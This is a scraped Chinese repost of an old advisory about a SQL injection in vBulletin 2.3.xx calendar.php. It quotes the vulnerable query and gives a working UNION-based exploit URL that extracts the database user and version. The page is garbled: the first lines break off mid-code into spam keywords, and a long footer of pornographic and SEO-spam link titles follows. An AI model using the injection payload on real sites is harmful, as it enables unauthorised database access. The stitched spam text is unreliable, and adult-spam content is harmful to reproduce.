vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit " /> 99久久99,激情四月婷婷,国产欧美一区二区三区久久

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

vBulletin Forum 2.3.xx SQL Injection

2014-10-22 01:46:01 分類：php技術閱讀()

vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

php技術：vBulletin Forum 2.3.xx SQL Injection，轉載需保留來源！

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。

標簽：

相關文章閱讀

php實現設計模式中的單例模式詳解
PHP實現設計模式中的抽象工廠模式詳解
Linux下安裝oracle客戶端并配置php5.3
五款PHP代碼重構工具推薦

主站蜘蛛池模板：图片区小说区区国产明星 | 污免费观看| 日韩亚洲一区二区三区 | 麻豆久久精品免费看国产 | 99精品国产第一福利网站 | 国产精品热久久毛片 | 好吊妞在线播放 | 亚洲成精品动漫久久精久 | 国产福利在线免费 | 99午夜视频| 樱花aⅴ一区二区三区四区影音先锋色天使 | 国产精品成人观看视频国产 | 精品国产高清自在线一区二区三区 | 一区二区三区亚洲区 | 九九久久免费视频 | 日本精品视频一区二区 | 色综合国产| 很黄的网站在线观看 | 九九综合视频 | 国产一区二区三区免费看 | 黄色网址中文字幕 | 国产精品入口 | 国产乱子精品免费视观看片 | 色视频免费观看高清完整 | 国产福利91精品 | 色老板免费在线 | 凹凸精品视频分类国产品免费 | 狠狠狠狠狠干 | 成人美女免费网站视频 | 91精品久久久久亚洲国产 | 激情小视频在线播放免费 | 99在线精品视频在线观看 | 国产成人精品免费视频大全五级 | 五月激情站 | 91综合在线 | 狠狠一区| 婷婷影院在线综合免费视频 | 高清一区二区三区 | 国产成人精品免费视频 | 国产伦精品一区二区三区 | 国外免费精品视频在线观看 |